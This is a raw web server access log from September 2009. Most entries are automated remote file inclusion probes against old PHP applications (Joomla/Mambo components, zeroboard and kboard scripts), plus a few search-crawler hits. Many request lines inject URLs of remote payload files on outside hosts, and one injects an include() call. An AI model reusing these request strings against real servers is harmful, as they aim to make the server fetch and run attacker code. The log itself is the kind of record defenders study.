206.225.23.4 - - [24/Sep/2009:01:54:19 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:01:54:19 -0500] "GET /logs/access_log.1243296000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:01:55:26 -0500] "GET /logs/access_log.1228867200//include/mail.inc.php?skin_board_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:01:55:26 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:01:55:26 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:01:55:56 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:01:55:56 -0500] "GET /logs/access_log.1249257600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:01:55:56 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:01:56:27 -0500] "GET /logs/access_log.1248998400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.234.62.129 - - [24/Sep/2009:01:57:17 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.234.62.129 - - [24/Sep/2009:01:57:17 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
203.234.62.129 - - [24/Sep/2009:01:57:22 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
203.234.62.129 - - [24/Sep/2009:01:57:37 -0500] "GET /logs/access_log.1249862400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:01:22 -0500] "GET /skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:01:22 -0500] "GET /logs/access_log.1241481600/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:01:22 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:02:01:23 -0500] "GET /logs/access_log.1251590400//ampoll/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org/bbs/skin/ggambo7002_pw/wondho/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:02:01:23 -0500] "GET //ampoll/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org/bbs/skin/ggambo7002_pw/wondho/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:01:31 -0500] "GET /skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:01:39 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:01:39 -0500] "GET /logs/access_log.1241481600/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:03:25 -0500] "GET /logs/access_log.1241481600/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:03:31 -0500] "GET /logs/access_log.1241481600/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:03:31 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:03:32 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.243.71 - - [24/Sep/2009:02:03:34 -0500] "GET /skin/zero_vote/login.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:04:27 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:04:27 -0500] "GET /logs/access_log.1250467200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:04:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
83.133.121.221 - - [24/Sep/2009:02:07:04 -0500] "GET /setup.php?dir=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.831"
83.133.121.221 - - [24/Sep/2009:02:07:04 -0500] "GET /logs/setup.php?dir=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
122.155.5.84 - - [24/Sep/2009:02:10:31 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:10:31 -0500] "GET /logs/access_log.1250467200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:10:31 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.55.51.69 - - [24/Sep/2009:02:11:22 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.207.172.166 - - [24/Sep/2009:02:13:38 -0500] "GET /logs/access_log.1250640000//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.207.172.166 - - [24/Sep/2009:02:13:39 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.207.172.166 - - [24/Sep/2009:02:13:39 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 200 206241 "-""Mozilla/5.0"
211.239.157.203 - - [24/Sep/2009:02:14:02 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://fpappalardo.com/logs/yes.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
211.239.157.203 - - [24/Sep/2009:02:14:02 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://fpappalardo.com/logs/yes.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
69.73.185.40 - - [24/Sep/2009:02:17:34 -0500] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:34 -0500] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:34 -0500] "GET ///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:34 -0500] "GET ///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:34 -0500] "GET /logs/access_log.1252281600///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:34 -0500] "GET /logs/access_log.1252281600///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:38 -0500] "GET ///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:38 -0500] "GET /logs/access_log.1252281600///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:38 -0500] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:38 -0500] "GET ///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:38 -0500] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:38 -0500] "GET /logs/access_log.1252281600///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:44 -0500] "GET ///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:44 -0500] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:44 -0500] "GET /logs/access_log.1252281600///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:48 -0500] "GET ///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:48 -0500] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:48 -0500] "GET /logs/access_log.1252281600///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:58 -0500] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:58 -0500] "GET /logs/access_log.1252281600///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:17:58 -0500] "GET ///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.207.140 - - [24/Sep/2009:02:20:00 -0500] "GET /_vti_cnf/ HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.155.5.84 - - [24/Sep/2009:02:21:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:21:39 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:21:39 -0500] "GET /logs/access_log.1249257600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:21:39 -0500] "GET /logs/access_log.1250726400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.207.29 - - [24/Sep/2009:02:27:59 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.197.26 - - [24/Sep/2009:02:28:08 -0500] "GET /logs/access_log.1252195200/index1.php?choix=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
94.23.197.26 - - [24/Sep/2009:02:28:08 -0500] "GET /logs/index1.php?choix=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
94.23.197.26 - - [24/Sep/2009:02:28:08 -0500] "GET /index1.php?choix=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
94.23.197.26 - - [24/Sep/2009:02:28:09 -0500] "GET /index1.php?choix=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
94.23.197.26 - - [24/Sep/2009:02:28:09 -0500] "GET /logs/index1.php?choix=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
94.23.197.26 - - [24/Sep/2009:02:28:09 -0500] "GET /logs/access_log.1252195200/index1.php?choix=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
59.24.49.35 - - [24/Sep/2009:02:28:56 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:02:28:56 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:02:28:57 -0500] "GET /logs/access_log.1248393600/lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:02:28:57 -0500] "GET /logs/access_log.1238371200/lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.106.158 - - [24/Sep/2009:02:31:29 -0500] "GET /logs/access_log.1121040000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.115.111.122 - - [24/Sep/2009:02:31:47 -0500] "GET /logs/access_log.1240099200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:02:31:47 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:02:31:47 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.115.68.51 - - [24/Sep/2009:02:32:26 -0500] "GET /?sourcedir=http://www.koryochemical.co.kr/board/download/fxid1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.115.68.51 - - [24/Sep/2009:02:32:26 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.koryochemical.co.kr/board/download/fxid1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.115.68.51 - - [24/Sep/2009:02:32:26 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://www.koryochemical.co.kr/board/download/fxid1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.115.68.51 - - [24/Sep/2009:02:32:28 -0500] "GET /logs/?sourcedir=http://www.koryochemical.co.kr/board/download/fxid1.txt??? HTTP/1.1" 200 206236 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:32:54 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:32:54 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:32:54 -0500] "GET /logs/access_log.1250553600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:33:11 -0500] "GET /logs/access_log.1250899200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:33:22 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:33:22 -0500] "GET /logs/access_log.1250553600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:33:22 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:02:33:38 -0500] "GET /logs/access_log.1250899200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
83.133.121.221 - - [24/Sep/2009:02:33:51 -0500] "GET //setup.php?dir=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.831"
83.133.121.221 - - [24/Sep/2009:02:33:51 -0500] "GET /logs//setup.php?dir=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
59.24.49.35 - - [24/Sep/2009:02:34:20 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:02:34:20 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:02:34:20 -0500] "GET /logs/access_log.1248393600/lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:02:34:20 -0500] "GET /logs/access_log.1238371200/lostpasswd.php?env[include_prefix]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.106.157 - - [24/Sep/2009:02:34:29 -0500] "GET /logs/access_log.1223337600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.137 - - [24/Sep/2009:02:35:00 -0500] "GET /logs/access_log.1248739200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
199.120.90.223 - - [24/Sep/2009:02:36:05 -0500] "GET //include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
199.120.90.223 - - [24/Sep/2009:02:36:06 -0500] "GET /logs/access_log.1228867200//include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
199.120.90.223 - - [24/Sep/2009:02:36:06 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
199.120.90.223 - - [24/Sep/2009:02:36:46 -0500] "GET //include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
199.120.90.223 - - [24/Sep/2009:02:36:47 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
199.120.90.223 - - [24/Sep/2009:02:36:47 -0500] "GET /logs/access_log.1228867200//include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
199.120.90.223 - - [24/Sep/2009:02:37:07 -0500] "GET //include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
94.23.197.26 - - [24/Sep/2009:02:37:07 -0500] "GET /logs/index1.php?menu=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
94.23.197.26 - - [24/Sep/2009:02:37:07 -0500] "GET /index1.php?menu=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
94.23.197.26 - - [24/Sep/2009:02:37:07 -0500] "GET /logs/access_log.1252195200/index1.php?menu=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
199.120.90.223 - - [24/Sep/2009:02:37:07 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
199.120.90.223 - - [24/Sep/2009:02:37:08 -0500] "GET /logs/access_log.1228867200//include/mail.inc.php?skin_board_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
94.23.197.26 - - [24/Sep/2009:02:37:08 -0500] "GET /index1.php?menu=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
94.23.197.26 - - [24/Sep/2009:02:37:08 -0500] "GET /logs/index1.php?menu=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
94.23.197.26 - - [24/Sep/2009:02:37:08 -0500] "GET /logs/access_log.1252195200/index1.php?menu=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
69.73.185.40 - - [24/Sep/2009:02:38:17 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:38:17 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:38:17 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:38:19 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:38:19 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
